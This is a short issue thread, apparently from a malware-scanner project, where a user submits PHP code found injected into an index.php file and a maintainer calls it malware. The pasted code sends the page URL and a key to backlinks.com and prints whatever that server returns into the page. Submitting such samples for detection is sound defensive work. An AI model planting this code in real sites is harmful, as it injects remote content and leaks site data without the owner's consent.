please include for scan
Closed this issue · 1 comments
savla-jigs commented
following code was injected on index.php file
$OpenInNewWindow = "1";
// # DO NOT MODIFY ANYTHING ELSE BELOW THIS LINE!
// ----------------------------------------------
$BLKey = "CAHP-YX3S-PWBH";
if(isset($_SERVER['SCRIPT_URI']) && strlen($_SERVER['SCRIPT_URI'])){
$_SERVER['REQUEST_URI'] = $_SERVER['SCRIPT_URI'].((strlen($_SERVER['QUERY_STRING']))?'?'.$_SERVER['QUERY_STRING']:'');
}
if(!isset($_SERVER['REQUEST_URI']) || !strlen($_SERVER['REQUEST_URI'])){
$_SERVER['REQUEST_URI'] = $_SERVER['SCRIPT_NAME'].((isset($_SERVER['QUERY_STRING']) && strlen($_SERVER['QUERY_STRING']))?'?'.$_SERVER['QUERY_STRING']:'');
}
$QueryString = "LinkUrl=".urlencode(((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS']=='on')?'https://':'http://').$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
$QueryString .= "&Key=" .urlencode($BLKey);
$QueryString .= "&OpenInNewWindow=" .urlencode($OpenInNewWindow);
if(intval(get_cfg_var('allow_url_fopen')) && function_exists('readfile')) {
@readfile("http://www.backlinks.com/engine.php?".$QueryString);
}
elseif(intval(get_cfg_var('allow_url_fopen')) && function_exists('file')) {
if($content = @file("http://www.backlinks.com/engine.php?".$QueryString))
print @join('', $content);
}
elseif(function_exists('curl_init')) {
$ch = curl_init ("http://www.backlinks.com/engine.php?".$QueryString);
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_exec ($ch);
if(curl_error($ch))
print "Error processing request";
curl_close ($ch);
}
else {
print "It appears that your web host has disabled all functions for handling remote pages and as a result the BackLinks software will not function on your web page. Please contact your web host for more information.";
}ping me back if any more details needed.
gwillem commented
Thanks, this is curious malware. Did it print anything at the time of your discovery?